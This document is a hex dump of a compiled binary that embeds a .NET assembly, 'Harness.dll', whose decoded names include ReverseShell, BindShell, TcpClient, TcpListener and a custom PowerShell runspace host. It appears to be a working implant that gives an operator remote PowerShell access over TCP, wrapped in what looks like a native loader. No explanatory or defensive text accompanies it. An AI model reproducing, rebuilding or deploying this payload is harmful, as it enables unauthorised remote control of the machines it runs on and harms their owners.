460000000100ad0800000100ad0800000100b30800000100b70800000100bc0800000100b70800000100c00800000200c70800000100c00800000200c70800000100c00800000200c70800000100c00800000200c70800000100c00800000200c70800000100a60200000100360100000100a60200000100c90800000100ad0800000100d00800000200e00800000300ad0800000100d00800000200e00800000300ad0800000100ad0800000100ad0800000100ad0800000100f00800000100f00800000100f80800000200010900000100080900000200f00800000300100900000100080900000200f008000003001d0900000400250900000100080900000200f008000003003309000004003c09000005004709000006005e0900000100080900000200f008000003003309000004003c0900000100ad0800000100ad0800000100ad0800000100ad0800000100ad08000001006609000001005e09000001007009000002007709000003008309000004008809000001006609000002008809000001008d0900000200940900000100ad0800000100ad0800000100ad08f900a70156000101a70156000901a70156001101a70156001901a70156002101a70156002901a70156003101a70156003901a70156004101a70139004901a70156005101a70156005901a70156006101a70142006901a70131000900a701310049008b0b79014900ae0b7e017901d70b85013900f60b8e013900080c310031000d0ca3014100170ca80189012f0c350031003b0c3e0099016b0cad019901750cb301a101860c8100a101900cbb01a101970cc101a101900cc701a101a30c81001100eb028a001900dd035600a101ab0cc101a101b90ccd011900f40356008901c30cd2013100c80c3100b101da0c31003100a7013100b901a7013100c1017e0df201d901a701fc013100a30d0202e101b70d0a02f101a7010202f101d20d3100f101d80d4c000c00a70131000102060e3a020c000f0e3e00a101190e3e00a101240e6202a1012e0e6802a101340e78024100420e7d0241004c0e7d021400a70131001c00a70193021400790e99024100950ea4023102ad0eaa022400790e99023102c50ebe022c00790e99023102df0ed2023400790e99023102f70ee6023c00790e990241000b0ffa0259020b0f00034400320f0e0369024f0f140341006b0f1e038102770f35004100870f3a033900a60f3f038902cb0f45039102dd0f4b030900fb0f8100a101900c510359020410310014000a1067034c002010780354002e108a03a9025910350024002010a9035c002e108a031900090456002400041031002c002010a90364002e108a031900290456002c000410310034002010a9036c002e108a031900180456003400041031003c002010a90374002e108a031900fa0356003c00041031005900621013041100a70131006100a7012104b90282103104b90213038f00b90226038f00c102a70156001900a70131008901ac1035009901b910ad019901c2103c048901f4034204c900cb104200c900d5104200d100e0104200d100e61042002100a70131002e003300cd042e000b0073042e001300bb042e001b00cd042e002300cd042e002b00cd042e005300cd042e003b00d3042e004300cd042e006b0015052e007b002b052e005b00eb042e0073002205c3005301ed01950199019d01da010f021e024f026f0258038f03bc03d403ec03040418041d0427042c0437044a04500455045a045f04640402000100030003000400090005000b0000009202620000009d0266000000980394000000a30399000000d7029d000000a803a2000000ab03a7000000ba03a70000008905990000009005ff00000011086a01000021086f0100002c08740100003b086600000046086a01000056086200000063086f01000079086f01000087087401000096086f010000a1089900020002000300010003000300020004000500010005000500020013000700020014000900020015000b00020016000d00020017000f0002001800110002002a00130002002f001500020032001700010033001700010035001900020034001900020036001b00010037001b00020038001d00010039001d0002003b001f0001003c001f0002003e00210002003f002300020040002500010046002700020045002700010048002900020047002900020049002b0001004a002b00320283028b02b502c902dd02f102060371038203b303cb03e303fb034824000019000480000001000000000000000000000000001600000004000000000000000000000001006300000000000100000000000000000000000a007a000000000004000000000000000000000001006c00000000000200000000000000000000000100630000000000030002000400020005000200970033030000003c4d6f64756c653e004861726e6573732e646c6c004861726e65737300437573746f6d5053486f737400437573746f6d5053486f737455736572496e7465726661636500437573746f6d505352486f737452617755736572496e74657266616365006d73636f726c69620053797374656d004f626a6563740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e0053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e486f7374005053486f7374005053486f737455736572496e74657266616365005053486f737452617755736572496e746572666163650053797374656d2e4e65742e536f636b657473004e6574776f726b53747265616d0073747265616d00546370436c69656e7400636c69656e7400464f524d41540073686f756c64457869740065786974436f646500686f73740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e52756e7370616365730052756e7370616365006d7952756e537061636500506f7765725368656c6c00707300496e697469616c53657373696f6e5374617465007374617465002e63746f72006765745f53686f756c6445786974007365745f53686f756c6445786974006765745f45786974436f6465007365745f45786974436f646500496e766f6b6550530072756e00526576657273655368656c6c0042696e645368656c6c00497356616c69640050726f636573734c6f63616c0050726f636573735053004461746141646465644576656e74417267730050534f75747075745f446174614164646564004572726f725f446174614164646564005761726e696e675f44617461416464656400566572626f73655f4461746141646465640044656275675f4461746141646465640053686f756c64457869740045786974436f64650070726f6772616d0047756964005f686f73744964005f7569006765745f496e7374616e63654964006765745f4e616d650056657273696f6e006765745f56657273696f6e006765745f55490053797374656d2e476c6f62616c697a6174696f6e0043756c74757265496e666f006765745f43757272656e7443756c74757265006765745f43757272656e74554943756c7475726500456e7465724e657374656450726f6d707400457869744e657374656450726f6d7074004e6f74696679426567696e4170706c69636174696f6e004e6f74696679456e644170706c69636174696f6e0053657453686f756c644578697400496e7374616e63654964004e616d650055490043757272656e7443756c747572650043757272656e74554943756c74757265005f72617755690053656e644f75747075740057726974654c696e6500436f6e736f6c65436f6c6f7200577269746500577269746544656275674c696e650057726974654572726f724c696e65005772697465566572626f73654c696e650057726974655761726e696e674c696e650050726f67726573735265636f726400577269746550726f6772657373006765745f4f75747075740053797374656d2e436f6c6c656374696f6e732e47656e657269630044696374696f6e61727960320050534f626a6563740053797374656d2e436f6c6c656374696f6e732e4f626a6563744d6f64656c00436f6c6c656374696f6e6031004669656c644465736372697074696f6e0050726f6d70740043686f6963654465736372697074696f6e0050726f6d7074466f7243686f69636500505343726564656e7469616c00505343726564656e7469616c547970657300505343726564656e7469616c55494f7074696f6e730050726f6d7074466f7243726564656e7469616c006765745f526177554900526561644c696e650053797374656d2e536563757269747900536563757265537472696e6700526561644c696e654173536563757265537472696e67004f75747075740052617755490053697a65005f77696e646f7753697a6500436f6f7264696e61746573005f637572736f72506f736974696f6e005f637572736f7253697a65005f666f726567726f756e64436f6c6f72005f6261636b67726f756e64436f6c6f72005f6d6178506879736963616c57696e646f7753697a65005f6d617857696e646f7753697a65005f62756666657253697a65005f77696e646f77506f736974696f6e005f77696e646f775469746c65006765745f4261636b67726f756e64436f6c6f72007365745f4261636b67726f756e64436f6c6f72006765745f42756666657253697a65007365745f42756666657253697a65006765745f437572736f72506f736974696f6e007365745f437572736f72506f736974696f6e006765745f437572736f7253697a65007365745f437572736f7253697a6500466c757368496e707574427566666572006765745f466f726567726f756e64436f6c6f72007365745f466f726567726f756e64436f6c6f720042756666657243656c6c0052656374616e676c6500476574427566666572436f6e74656e7473006765745f4b6579417661696c61626c65006765745f4d6178506879736963616c57696e646f7753697a65006765745f4d617857696e646f7753697a65004b6579496e666f00526561644b65794f7074696f6e7300526561644b6579005363726f6c6c427566666572436f6e74656e747300536574427566666572436f6e74656e7473006765745f57696e646f77506f736974696f6e007365745f57696e646f77506f736974696f6e006765745f57696e646f7753697a65007365745f57696e646f7753697a65006765745f57696e646f775469746c65007365745f57696e646f775469746c65004261636b67726f756e64436f6c6f720042756666657253697a6500437572736f72506f736974696f6e00437572736f7253697a6500466f726567726f756e64436f6c6f72004b6579417661696c61626c65004d6178506879736963616c57696e646f7753697a65004d617857696e646f7753697a650057696e646f77506f736974696f6e0057696e646f7753697a650057696e646f775469746c650076616c756500617267006461746100636d640073656e6465720065006f757470757400666f726567726f756e64436f6c6f72006261636b67726f756e64436f6c6f72006d65737361676500736f757263654964007265636f72640063617074696f6e006465736372697074696f6e730063686f696365730064656661756c7443686f69636500757365724e616d65007461726765744e616d6500616c6c6f77656443726564656e7469616c5479706573006f7074696f6e730072656374616e676c6500736f757263650064657374696e6174696f6e00636c69700066696c6c006f726967696e00636f6e74656e74730053797374656d2e52756e74696d652e56657273696f6e696e67005461726765744672616d65776f726b4174747269627574650053797374656d2e5265666c656374696f6e00417373656d626c795469746c6541747472696275746500417373656d626c794465736372697074696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c79436f6d70616e7941747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7943756c747572654174747269627574650053797374656d2e52756e74696d652e496e7465726f70536572766963657300436f6d56697369626c65417474726962757465004775696441747472696275746500417373656d626c7956657273696f6e41747472696275746500417373656d626c7946696c6556657273696f6e4174747269627574650053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c6974794174747269627574650043726561746544656661756c7400417574686f72697a6174696f6e4d616e61676572007365745f417574686f72697a6174696f6e4d616e616765720052756e7370616365466163746f72790043726561746552756e73706163650050535468726561644f7074696f6e73007365745f5468726561644f7074696f6e73004f70656e0047657453747265616d004372656174650053797374656d2e494f0053747265616d006765745f43616e52656164006765745f5265636569766542756666657253697a6500427974650053797374656d2e5465787400456e636f64696e67006765745f415343494900476574537472696e6700537472696e67005472696d004368617200436f6e636174006f705f457175616c69747900546f4c6f776572006f705f496e657175616c697479006765745f4368617273005265616400436c6f73650049446973706f7361626c6500446973706f7365003c50726976617465496d706c656d656e746174696f6e44657461696c733e7b39424146384645382d364143442d343139312d423545392d4631323344323531313734347d00436f6d70696c657247656e6572617465644174747269627574650024246d6574686f643078363030303030382d310052756e74696d6548656c706572730041727261790052756e74696d654669656c6448616e646c6500496e697469616c697a6541727261790053797374656d2e4e65740049504164647265737300436f6e6e65637400456e7669726f6e6d656e74004578697400457863657074696f6e005463704c697374656e657200537461727400416363657074546370436c69656e7400505350617273654572726f72005053506172736572005053546f6b656e00546f6b656e697a65006765745f436f756e74006765745f4c656e67746800537562737472696e670053706c69740049734e756c6c4f72456d7074790041646453637269707400416464436f6d6d616e6400505344617461436f6c6c656374696f6e6031004576656e7448616e646c65726031006164645f4461746141646465640050534461746153747265616d73006765745f53747265616d73004572726f725265636f7264006765745f4572726f72005761726e696e675265636f7264006765745f5761726e696e6700566572626f73655265636f7264006765745f566572626f73650044656275675265636f7264006765745f4465627567005053436f6d6d616e64006765745f436f6d6d616e647300436f6d6d616e64436f6c6c656374696f6e00436f6d6d616e64006765745f4974656d00506970656c696e65526573756c745479706573004d657267654d79526573756c747300494173796e63526573756c7400426567696e496e766f6b65006765745f4973436f6d706c65746564006765745f52756e73706163650053657373696f6e537461746550726f7879006765745f53657373696f6e537461746550726f78790050617468496e7472696e73696373006765745f506174680050617468496e666f006765745f43757272656e7446696c6553797374656d4c6f636174696f6e00546f537472696e6700436c6561720052656164416c6c0049456e756d657261746f72603100476574456e756d657261746f72006765745f43757272656e740053797374656d2e436f6c6c656374696f6e730049456e756d657261746f72004d6f76654e657874004e6577477569640053797374656d2e546872656164696e6700546872656164006765745f43757272656e74546872656164004e6f74496d706c656d656e746564457863657074696f6e006765745f43616e5772697465006765745f55544638004765744279746573007365745f5769647468007365745f486569676874007365745f58007365745f59000003200000093c00720066003e00000b3c002f00720066003e00000765006e006400000100575b0021005d0020005400720061006e00730066006500720020006500720072006f0072007300200066006f0075006e0064002e002000540072007900200069006d0070006f0072007400200061006700610069006e00000965007800690074000009710075006900740000073e003e002000001b65006e00610062006c0065002d0066006f0072006d0061007400011d640069007300610062006c0065002d0066006f0072006d006100740001295b002b005d00200046006f0072006d0061007400740069006e006700200061006400640065006400002d5b002d005d00200046006f0072006d0061007400740069006e0067002000720065006d006f0076006500640001050d000a0000154f00750074002d0053007400720069006e006700010750005300200000053e00200000817745006e007400650072004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e002000200054006800650020007300630072006900700074002000690073002000610073006b0069006e006700200066006f007200200069006e007000750074002c00200077006800690063006800200069007300200061002000700072006f0062006c0065006d002000730069006e00630065002000740068006500720065002700730020006e006f00200063006f006e0073006f006c0065002e00200020004d0061006b00650020007300750072006500200074006800650020007300630072006900700074002000630061006e0020006500780065006300750074006500200077006900740068006f00750074002000700072006f006d007000740069006e006700200074006800650020007500730065007200200066006f007200200069006e007000750074002e0001817545007800690074004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e002000200054006800650020007300630072006900700074002000690073002000610073006b0069006e006700200066006f007200200069006e007000750074002c00200077006800690063006800200069007300200061002000700072006f0062006c0065006d002000730069006e00630065002000740068006500720065002700730020006e006f00200063006f006e0073006f006c0065002e00200020004d0061006b00650020007300750072006500200074006800650020007300630072006900700074002000630061006e0020006500780065006300750074006500200077006900740068006f00750074002000700072006f006d007000740069006e006700200074006800650020007500730065007200200066006f007200200069006e007000750074002e0001030a00000f440045004200550047003a002000000f4500520052004f0052003a002000001356004500520042004f00530045003a00200000135700410052004e0049004e0047003a002000003d500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e00004f500072006f006d007000740046006f007200430068006f0069006300650020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e000059500072006f006d007000740046006f007200430072006500640065006e007400690061006c00310020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e000059500072006f006d007000740046006f007200430072006500640065006e007400690061006c00320020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e00003952006500610064004c0069006e00650020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00005552006500610064004c0069006e0065004100730053006500630075007200650053007400720069006e00670020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004946006c0075007300680049006e0070007500740042007500660066006500720020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004b47006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e0000414b006500790041007600610069006c00610062006c00650020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00003752006500610064004b006500790020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004f5300630072006f006c006c0042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e00740065006400004b53006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004953006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640000000000e88faf9bcd6a9141b5e9f123d25117440008b77a5c561934e0890831bf3856ad364e3503061215030612190206020206080306120c0306121d0306122103061225032000010320000204200101020320000804200101080400010e0e0420001219042001020e042001010e062002011c12290328000203280008030612080306112d03061210052001011208042000112d0320000e0420001231042000120d0420001235042800112d0328000e0428001231042800120d04280012350306121408200301113911390e062002010a123d112003151241020e12450e0e15124901124d0c2004080e0e151249011251080c200612550e0e0e0e1159115d08200412550e0e0e0e04200012110420001261042800121103061165030611690306113902060e0420001139052001011139042000116505200101116504200011690520010111690c200114116d02000200001171062001117511790b200401117111691171116d072002011171116d0d200201116914116d02000200000428001139042800116504280011690400001225062001011280b9080002121d12091225062001011180c1030701020307010805070212080e042000121504000012210500001280cd0720030e1d0508080500020e1c1c050002020e0e0500020e0e0e0420010308072003081d05080812070d030e0e0e02021d050e0e0812211221020401000000090002011280e51180e9052001011d05072002011280ed0804000101080e070512191d051280ed1280f512191307071d051280ed1280f912191280f512191d0507151249011280fd14000215128105011281090e1015128105011280fd120704151249011280fd1512490112810902020520020e08080620011d0e1d030807040e1d0e1d030e040001020e05200112210e071512810d0112450715128111011229052002011c180a200101151281150112290520001281190a20001512810d0112811d081512810d0112811d0a20001512810d01128121081512810d011281210a20001512810d01128125081512810d011281250a20001512810d01128129081512810d0112812905200012812d0520001281310715124901128135052001130008092002011181391181391430020212813d1512810d011e001512810d011e01060a0212451245042000121d05200012814505200012814905200012814d0600030e0e0e0e0e07041512810d0112451281410e02092000151281050113000615124901124509200015128151011300071512815101124504200013001907051512810d011245151249011245124515128151011245020920001512815901130008151281510112811d0e070312811d151281510112811d020815128151011281210e07031281211512815101128121020815128151011281250e07031281251512815101128125020815128151011281290e0703128129151281510112812902040000112d040701112d0307010e0520020108080407011231040701120d05000012815d04070112350520011d050e072003011d0508080507021d050204070112110407011139040701116504070111690e07061165116911651165116511694701001a2e4e45544672616d65776f726b2c56657273696f6e3d76342e300100540e144672616d65776f726b446973706c61794e616d65102e4e4554204672616d65776f726b20341101000c486f73742050726f63657373000005010000000017010012436f7079726967687420c2a920203230313500002901002466353961636637662d306632362d343761312d386434322d61633266363130343234326200000c010007312e302e302e3000000801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f77730100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000586000007c02000000000000000000007c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004dc010000010053007400720069006e006700460069006c00650049006e0066006f000000b8010000010030003000300030003000340062003000000044000d000100460069006c0065004400650073006300720069007000740069006f006e000000000048006f00730074002000500072006f00630065007300730000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000038000c00010049006e007400650072006e0061006c004e0061006d00650000004800610072006e006500730073002e0064006c006c0000004800120001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a900200020003200300031003500000040000c0001004f0072006900670069006e0061006c00460069006c0065006e0061006d00650000004800610072006e006500730073002e0064006c006c000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000680401800100000000000000000000002e3f41565f636f6d5f6572726f7240400000000000000000680401800100000000000000000000002e3f41566261645f616c6c6f634073746440400000000000680401800100000000000000000000002e3f4156657863657074696f6e4073746440400000000000680401800100000000000000000000002e3f4156747970655f696e666f404000680401800100000000000000000000002e3f41566261645f657863657074696f6e407374644040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100000751000007067010090100000b31600007c670100c0160000081900006c68010010190000301900002c690100301900009119000034690100c0190000ce1900003c690100ce190000a91d000048690100a91d0000871e00006c690100901e0000132000007c6901003020000070200000706c010070200000ad200000706c0100b020000003210000a86c01001021000044210000b0690100602100007f210000b8690100802100004c220000706c01005422000075220000706c010088220000f1220000bc690100f42200002d230000a86c0100302300008f240000c469010090240000cd2400003c6a0100d0240000f0250000e4690100f025000033260000706c0100342600003e2700000c6a010040270000572700002c690100582700009527000080710100982700004e2800003c6a01005028000019290000b86a01001c290000482a00009c6a0100482a0000dc2a00004c6a0100dc2a00007d2b0000e06a0100802b0000d12b0000746a0100d42b0000172c0000706c0100182c0000762c0000a86c0100782c00008d2c00002c690100902c0000a52c00002c690100a82c0000da2c0000706c0100dc2c0000f72c0000706c0100f82c0000132d0000706c0100142d0000352e0000606a0100382e0000bf2e0000d06a0100c02e0000552f0000906c0100702f0000be2f0000f86a0100c02f000085300000006b010088300000a63000002c690100a8300000e1300000a86c0100003100002a330000106b0100bc33000005340000706c010008340000d9340000146b0100dc340000ce3500001c6b0100d83500003d3600003c6b0100403600005e36000034690100603600009b3600002c6901009c360000bc3600002c690100bc3600000a370000a86c01000c3700002c3700002c6901007c370000a9370000706c0100c8370000f2370000706c01000438000048380000a86c01004838000081380000a86c010084380000de380000506b0100e038000007390000706c01001c3900004f390000706c010058390000243b0000c86b0100383b00006b3c0000606b01006c3c0000a83c0000706c0100a83c0000cc3c0000706c0100cc3c00004e3d0000a86c0100503d0000123e0000946b0100143e0000933e0000706c0100943e0000b83e00002c690100b83e0000f93e0000706c0100fc3e0000123f0000706c0100143f00005a400000a86c01005c40000082400000706c0100944000002a410000706c01003841000083410000706c010084410000e4410000c86b0100e44100001d420000a86c010038420000cd430000dc6b0100d0430000f04300002c690100fc430000294700000c6c01002c4700009f4700003c6a0100a047000093480000546c0100944800005b4a00009c6a01005c4a00008d4b00003c6b0100904b00003c4c0000646c01003c4c0000304d0000506f0100304d00009d4d0000786c0100a04d0000114e0000846c0100844e0000af4e00002c690100b04e0000fc4e0000706c0100fc4e0000f6520000706c0100005300001f530000706c01002053000040530000706c010040530000bf530000906c0100c05300003a540000906c01003c540000bd540000906c0100c0540000f8540000a86c0100f854000030550000a86c01003055000011570000b46c0100145700004d5700002c69010050570000935700002c690100c4570000335a0000d06c0100505a0000b55f0000f86c0100b85f000026600000fc6d01002860000049600000706c01005c60000095600000a86c01009860000059610000a06d01005c61000010660000846d01001066000075680000e46d0100786800004f6900001c6e0100746900002a6a0000b86d01002c6a00007b6c0000506e01007c6c00007f6e0000fc6c0100806e0000d36e00002c690100d46e000066700000486d0100687000008c720000386e01008c720000b9730000906c0100bc730000e37300002c690100e47300000d740000706c01001c74000057740000a86c010060740000ec740000c86b0100ec7400000c750000a06e01000c7500002b750000806e01002c750000497500002c6901004c750000697500002c6901006c750000cf750000706c0100e075000047760000c06e010048760000b4760000c46e0100b476000058780000e46e01005878000000790000706c01000079000024790000b069010024790000a279000034690100a4790000547d0000346f0100547d00004d7f0000006f0100507f0000478000001c6f010048800000a9810000506f0100ac8100007d820000686f010080820000b4830000806f0100bc83000052840000bc6901005c8400009c840000f86e0100a484000023850000bc6901003885000071850000a86c01007c850000dd850000706c0100f085000098860000986f010098860000dc860000a86c0100dc86000063870000c86b010064870000218800009c6f010024880000858800003c6a01002c890000c28a0000c86b0100688b0000dd8b0000cc6f0100e08b0000428c0000a86c0100448c00006c8c00002c6901006c8c0000e98c0000bc690100ec8c00007a8d0000c86b01007c8d00005d8f000060700100608f00001a900000ec6f01001c9000006092000010700100609200000e9500004070010060950000ad9500007c700100189600004b980000a07001007098000094980000d0700100a0980000b8980000d8700100c0980000c1980000dc700100d0980000d1980000e0700100d49800006c990000a86c01006c9900009c9900002c6901009c990000019a0000706c0100049a0000359a0000706c0100a89a0000219b0000e4700100389b00000b9c00003c6a01000c9c0000a69c0000a86c0100a89c00002d9d0000706c0100309d00009b9d0000706c0100b89d0000f89d00002c690100f89d00006ba00000f470010090a00000d0a0000010710100d8a000002da100002c69010030a10000aaa10000bc690100aca10000fea200001871010020a3000064a400002871010064a400002fa50000a86c010030a50000ffa500004471010000a60000c7a6000030710100d0a600009da7000070710100a0a7000057a800005871010064a800006ea900007871010070a90000dca9000080710100dca90000d6ad000078710100d8ad0000c4b0000098710100c4b000005ab10000887101005cb10000d2b20000d0710100d4b2000050b30000c071010050b30000dab30000906c0100dcb300000eb400002c69010010b400009fb40000f8710100f8b400001eb500002c69010020b500007fb500002c69010080b50000ccb50000706c0100ccb5000045b600003c6a010054b600003ab70000087201003cb70000e4b7000048720100e4b70000bfb8000070720100c0b8000007b900008072010008b900004bb90000bc6901004cb9000091b90000bc69010094b900004abf0000a07201004cbf000002c50000a072010004c5000065cd0000c472010068cd000040d80000e872010040d8000017d900000c73010018d90000f9d9000034730100fcd90000ede1000060730100f0e100006ae20000a86c01006ce20000d2e2000084730100f0e20000b7e30000a8730100b8e30000dae50000ac730100dce5000074e60000d473010074e600001ee70000c473010020e7000094e700002c690100c0e7000053e800003c6a010054e80000a5e9000000740100b0e9000009ea0000146b01000cea0000cfea000018740100d0ea00008aeb0000a86c01008ceb0000c3eb0000706c0100c4eb0000e4eb00002c690100e4eb00001fec0000b06901002cec0000bbec0000906c010068ed00008eed0000c46f01008eed0000d7ed0000c46f0100d7ed0000ebed0000c46f0100ebed000031ee0000946a010031ee00004aee0000c46f01004aee000063ee0000c46f010063ee000087ee0000c46f010087ee0000a2ee0000c46f0100a2ee000096ef0000c46f010096ef000014f000003c6d010014f000002cf00000c46f01002cf0000042f00000c46f010042f000006bf00000c46f01006bf0000084f00000c46f010084f00000a1f00000c46f0100a1f00000baf00000c46f0100baf00000d3f00000c46f0100e0f0000000f10000c46f010000f100001ef10000c46f01001ef1000046f10000c46f010046f100005ff10000c46f01005ff1000078f10000c46f010078f100008ff10000c46f01008ff10000a7f10000c46f0100a7f10000c0f10000c46f0100c0f10000d7f10000c46f0100000000000000000000000000000000000000000000000000000001001800000018000080000000000000000000000000000001000200000030000080000000000000000000000000000001000904000048000000601002007d010000000000000000000000000000000000003c3f786d6c2076657273696f6e3d27312e302720656e636f64696e673d275554462d3827207374616e64616c6f6e653d27796573273f3e0d0a3c617373656d626c7920786d6c6e733d2775726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763127206d616e696665737456657273696f6e3d27312e30273e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d276173496e766f6b6572272075694163636573733d2766616c736527202f3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a3c2f617373656d626c793e0d0a0000000000000000000000000000000000000000000000000000000000000000000000000001006000000098a2b0a2b8a2c0a2c8a2e0a2e8a2f0a248a350a358a360a360a468a470a478a480a488a490a498a4e8a8f8a808a918a928a938a948a958a968a978a988a998a9a8a9b8a9c8a9d8a9e8a9f8a908aa18aa28aa38aa48aa000000100100e000000050a458a460a468a450a858a860a868a840a948a950a958a960a968a970a978a980a988a990a998a9a0a9a8a9b0a9b8a9c0a9c8a9d0a9d8a9e0a9e8a9f0a9f8a900aa08aa10aa18aa20aa28aa30aa38aa40aa48aa50aa58aa60aa68aa70aa78aa80aa88aa90aa98aaa0aaa8aab0aab8aac0aac8aad0aad8aae0aae8aaf0aaf8aa00ab08ab10ab18ab20ab28ab30ab38ab40ab48ab50ab58ab60ab68ab70ab78ab80ab88ab90ab98aba0aba8abb0abb8abc0abc8abd0abd8abe0abe8abf0abf8ab00ac08ac10ac18ac20ac28ac30ac38ac40ac48ac50ac000000200100b4000000b8aac8aad8aae8aaf8aa08ab18ab28ab38ab48ab58ab68ab78ab88ab98aba8abb8abc8abd8abe8abf8ab08ac18ac28ac38ac48ac58ac68ac78ac88ac98aca8acb8acc8acd8ace8acf8ac08ad18ad28ad38ad48ad58ad68ad78ad88ad98ada8adb8adc8add8ade8adf8ad08ae18ae28ae38ae48ae58ae68ae78ae88ae98aea8aeb8aec8aed8aee8aef8ae08af18af28af38af48af58af68af78af88af98afa8afb8afc8afd8afe8aff8af0000003001000802000008a018a028a038a048a058a068a078a088a098a0a8a0b8a0c8a0d8a0e8a0f8a008a118a128a138a148a158a168a178a188a198a1a8a1b8a1c8a1d8a1e8a1f8a108a218a228a238a248a258a268a278a288a298a2a8a2b8a2c8a2d8a2e8a2f8a208a318a328a338a348a358a368a378a388a398a3a8a3b8a3c8a3d8a3e8a3f8a308a418a428a438a448a458a468a478a488a498a4a8a4b8a4c8a4d8a4e8a4f8a408a518a528a538a548a558a568a578a588a598a5a8a5b8a5c8a5d8a5e8a5f8a508a618a628a638a648a658a668a678a688a698a6a8a6b8a6c8a6d8a6e8a6f8a608a718a728a738a748a758a768a778a788a798a7a8a7b8a7c8a7d8a7e8a7f8a708a818a828a838a848a858a868a878a888a898a8a8a8b8a8c8a8d8a8e8a8f0a800a910a920a930a940a950a960a970a980a990a9a0a9b0a9c0a9d0a9e0a9f0a900aa10aa20aa30aa40aa50aa60aa70aa80aa90aaa0aab0aac0aad0aae0aaf0aa00ab10ab20ab30ab40ab50ab60ab70ab80ab90aba0abb0abc0abd0abe0abf0ab00ac10ac20ac30ac40ac50ac60ac70ac80ac90aca0acb0acc0acd0ace0acf0ac00ad10ad20ad30ad40ad50ad60ad70ad80ad90ada0adb0adc0add0ade0adf0ad00ae10ae20ae30ae40ae50ae60ae70ae80ae90aea0aeb0aec0aed0aee0aef0ae00af10af20af30af40af50af60af70af80af90afa0afb0afc0afd0afe0aff0af00400100f000000000a010a020a030a040a050a060a070a080a090a0a0a0b0a0c0a0d0a0e0a0f0a000a110a120a130a140a150a160a170a180a190a1a0a1b0a1c0a1d0a1e0a1f0a100a210a220a230a240a250a260a270a280a290a2a0a2b0a2c0a2d0a2e0a2f0a200a310a320a330a340a350a360a370a380a390a3a0a3b0a3c0a3d0a3e0a3f0a300a410a420a430a440a450a460a470a480a490a4a0a4b0a4c0a4d0a4e0a4f0a400a510a520a530a540a550a560a570a580a590a5a0a5b0a5c0a5d0a5e0a5f0a500a610a620a630a640a650a660a670a680a690a6a0a6b0a6c0a6d0a6e0a6f0a600a710a720a70000006001000c000000b8a4000000800100e800000018a030a238a240a248a250a258a260a268a270a278a2d0a4d8a4e0a4e8a4f0a4f8a400a508a510a518a520a528a530a538a540a548a550a558a560a568a570a578a580a588a590a598a5a0a5a8a5b0a5b8a5c0a5c8a5d0a5d8a5e0a5e8a5f0a5f8a500a608a610a